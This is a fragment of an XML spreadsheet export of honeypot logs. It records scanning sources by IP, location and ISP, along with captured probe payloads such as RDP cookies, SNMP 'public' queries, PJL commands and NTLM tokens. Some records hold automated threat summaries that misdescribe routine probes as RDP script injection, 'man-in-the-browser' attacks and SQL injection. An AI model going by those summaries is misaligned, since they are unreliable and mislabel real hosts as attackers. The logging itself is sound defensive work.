    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:a40c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="260"/>
    <x v="260"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T05:29:52"/>
    <d v="2025-04-30T05:15:10"/>
    <d v="2025-04-30T05:29:52"/>
    <n v="19"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="Multiplay-Prepaid"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d1:5614"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="261"/>
    <x v="261"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T05:20:08"/>
    <d v="2025-04-30T05:20:08"/>
    <d v="2025-04-30T05:20:08"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_FTP_HC1"/>
    <s v="21"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="OC"/>
    <s v="Oceania"/>
    <s v="CK"/>
    <s v="Cook Islands"/>
    <s v="NA"/>
    <s v="Rarotonga"/>
    <s v="NA"/>
    <s v="Avarua"/>
    <s v="4035715"/>
    <s v="NA"/>
    <s v="-21.2129"/>
    <s v="-159.782"/>
    <s v="14593"/>
    <s v="SPACEX-STARLINK"/>
    <s v="SpaceX Starlink"/>
    <s v="consumer"/>
    <s v="SpaceX Starlink"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_FTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ce53:7f6c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="262"/>
    <x v="262"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T05:11:05"/>
    <d v="2023-10-22T07:03:54"/>
    <d v="2025-04-30T05:11:05"/>
    <n v="416"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SSH_H34&amp;&amp;SMA-LAB_SSH_H46&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41"/>
    <s v="22&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:afcb:f5cc"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="263"/>
    <x v="263"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T05:05:56"/>
    <d v="2023-11-25T18:43:38"/>
    <d v="2025-04-30T05:05:56"/>
    <n v="596"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_NTP_H10&amp;&amp;SMA-LAB_POP3_H35&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_IMAP_H6&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_IMAP_H10&amp;&amp;SMA-LAB_ORACLE_H7&amp;&amp;SMA-LAB_SNMP_H2&amp;&amp;SMA-LAB_POP3_H14&amp;&amp;SMA-LAB_ORACLE_H11&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_IMAP_H13&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_IMAP_H26&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_ORACLE_H6&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_POP3_H41&amp;&amp;SMA-LAB_IMAP_H33&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_NTP_H5&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_RDP_H33&amp;&amp;SMA-LAB_ORACLE_H44&amp;&amp;SMA-LAB_IMAP_H29&amp;&amp;SMA-LAB_SIP_H23&amp;&amp;SMA-LAB_POP3_H12&amp;&amp;SMA-LAB_REDIS_H44&amp;&amp;SMA-LAB_FTP_H10&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_SMB_H4&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_SNMP_H11&amp;&amp;SMA-LAB_ORACLE_H12&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_SNMP_H44&amp;&amp;SMA-LAB_POP3_H16&amp;&amp;SMA-LAB_PJL_H37&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_POP3_H39&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_FTP_H2&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_POSTGRES_H12&amp;&amp;SMA-LAB_MYSQL_H39&amp;&amp;SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_MSSQL_H37&amp;&amp;SMA-LAB_MYSQL_H47&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_NTP_H19&amp;&amp;SMA-LAB_ORACLE_H33"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;110&amp;&amp;53671&amp;&amp;143&amp;&amp;80&amp;&amp;3389&amp;&amp;54128&amp;&amp;1521&amp;&amp;161&amp;&amp;5432&amp;&amp;57774&amp;&amp;20184&amp;&amp;23&amp;&amp;6379&amp;&amp;56229&amp;&amp;445&amp;&amp;56781&amp;&amp;51974&amp;&amp;9100&amp;&amp;3306&amp;&amp;1433&amp;&amp;51762&amp;&amp;389&amp;&amp;21&amp;&amp;443&amp;&amp;55303&amp;&amp;49654&amp;&amp;49301&amp;&amp;1080&amp;&amp;51926&amp;&amp;55152&amp;&amp;5900&amp;&amp;53425&amp;&amp;51592"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3835"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;stshash&amp;&amp;command&amp;&amp;GET&amp;&amp;request&amp;&amp;query"/>
    <s v="NA&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NccSyfCMo'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ctNZDW'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=zyXLyR'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=wiYIXWUJG'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OCydRL'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=bexmDx'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qCClpfWiL'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HoXWXy'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=kCObtl'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NIZHYMECl'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UUVNPp'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=YmJMoY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=DXwWFgnor'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cWlmGN'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nZlVth'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fmAYRtYiH'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=lSGRmy'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CrXjaz'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.76,65044)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.76,65054)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.76,65062)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.76,62088)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.76,62104)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.76,62120)}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=NtrHNgExa'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fQGrfa'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=oxTEnG'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cdd2:1f4c"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="An attacker is attempting to inject malicious code into an RDP session, likely using a technique called &quot;man-in-the-browser&quot; attack. This involves exploiting the browser's trust in the user to carry out malicious actions. The attacker is attempting to bypass security controls through this method. &amp;&amp; Malicious actor attempting to inject malicious script into Remote Desktop Protocol session, possibly exploiting vulnerability for unauthorized access. The injected script is using a specific hash value to potentially bypass security measures. This activity suggests an attempt to escalate privileges or gain unauthorized control over the system. &amp;&amp; The system attempted to access an Oracle database, but was unable to authenticate due to missing credentials. This suggests a potential brute-force login attempt or exploitation of the database service. Further analysis is needed to determine the intent behind this activity. &amp;&amp; The data indicates an attempt to retrieve SNMP information from a system without authorization, potentially for reconnaissance or malicious purposes. The lack of SNMP data may indicate that the attempt was unsuccessful or that the requested data is not available. This could be an initial step in a larger attack. &amp;&amp; Unauthorized access to a network service is detected, using default community string &quot;public&quot; which is often used for initial setup but should be changed for security reasons. This could be an attempt to gain unauthorized access or extract sensitive information. The version indicates the SNMP protocol being used. &amp;&amp; The data indicates possible probing or reconnaissance activity targeting an Oracle database service, as it's unable to gather information from it, suggesting an attempt to map the system's capabilities. &amp;&amp; Malicious activity detected, attempted FTP connection is missing necessary information to proceed. This suggests an incomplete or fake attempt to exploit the system via FTP. No legitimate credentials provided. &amp;&amp; Attempt to initiate encrypted connection, likely part of brute-force login attempt. Malicious actor attempting to establish secure communication for unauthorized access. Possible precursor to password guessing or other malicious actions. &amp;&amp; A user is attempting to enable secure (TLS) authentication for an FTP service, which may be an attempt to bypass weak or non-existent security measures on the server. The presence of TLS authentication suggests that the attacker is aware of potential vulnerabilities in non-TLS enabled services. This activity could indicate a reconnaissance step before exploiting vulnerabilities. &amp;&amp; There is an attempt to access IMAP service without providing any credentials or data. This could be a scanning activity for potential vulnerabilities or a reconnaissance step before more malicious actions. The attacker is likely trying to identify possible entry points into the system."/>
    <s v="Brute Login &amp;&amp; RDP Exploit &amp;&amp; SQL Injection &amp;&amp; Scan Failure"/>
  </r>
  <r>
    <x v="264"/>
    <x v="264"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T04:52:21"/>
    <d v="2024-04-01T22:18:00"/>
    <d v="2025-04-30T04:52:21"/>
    <n v="307"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_POP3_H23&amp;&amp;SMA-LAB_SSH_H47&amp;&amp;SMA-LAB_SIP_H17&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_FTP_HC1&amp;&amp;SMA-LAB_SIP_H27&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_MYSQL_H18&amp;&amp;SMA-LAB_PJL_H14&amp;&amp;SMA-LAB_MSSQL_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_POP3_H33&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_PJL_H18&amp;&amp;SMA-LAB_POSTGRES_H15&amp;&amp;SMA-LAB_SMTP_H13&amp;&amp;SMA-LAB_MSSQL_H38&amp;&amp;SMA-LAB_MSSQL_H9&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_SMB_H37&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_SIP_H40&amp;&amp;SMA-LAB_HTTP_H10"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;110&amp;&amp;22&amp;&amp;NA&amp;&amp;21&amp;&amp;23&amp;&amp;3306&amp;&amp;9100&amp;&amp;5432&amp;&amp;25&amp;&amp;80&amp;&amp;445&amp;&amp;443&amp;&amp;22002&amp;&amp;143"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['spam'&amp;&amp; 'unknown'&amp;&amp; 'exploits']}"/>
    <n v="164"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="9465"/>
    <s v="AGOTOZ PTE. LTD."/>
    <s v="Agotoz HK Limited"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;request&amp;&amp;GET&amp;&amp;NA&amp;&amp;query&amp;&amp;command"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.212;rport=64427'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '77.91.74.218:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 185.255.123.181:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '5.181.21.224:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '5.181.21.224:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '66.94.127.183:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '109.123.229.33:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '194.146.12.172:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '38.60.224.106:80', 'method': 'GET', 'uri': '/v1'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '38.60.224.106:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (rPajIOwE,)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.212;rport=58028'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.212;rport=46975'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.212,41624)}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '94.131.113.33:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '94.131.113.33:80', 'method': 'GET', 'uri': '/v1'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.212,7346)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (EQSzZCSv,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9ad4:8dd4"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Insufficient log data provided. &amp;&amp; Possible malicious activity is a GET request made to the root directory of the server, potentially scouting for vulnerabilities. The user agent appears to be a legitimate device type, but may be spoofed. This could be a reconnaissance attempt by an attacker."/>
    <s v="Port Scan"/>
  </r>
  <r>
    <x v="265"/>
    <x v="265"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T04:50:39"/>
    <d v="2025-04-22T19:41:39"/>
    <d v="2025-04-30T04:50:39"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="North"/>
    <s v="Sāhibābād Daulotpur"/>
    <s v="10263162"/>
    <s v="NA"/>
    <s v="28.747"/>
    <s v="77.1146"/>
    <s v="17488"/>
    <s v="HATHWAY CABLE AND DATACOM LIMITED"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="residential"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7d63:1ca"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="266"/>
    <x v="266"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T04:43:20"/>
    <d v="2025-04-30T04:43:20"/>
    <d v="2025-04-30T04:43:20"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:31e4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="267"/>
    <x v="267"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T04:35:11"/>
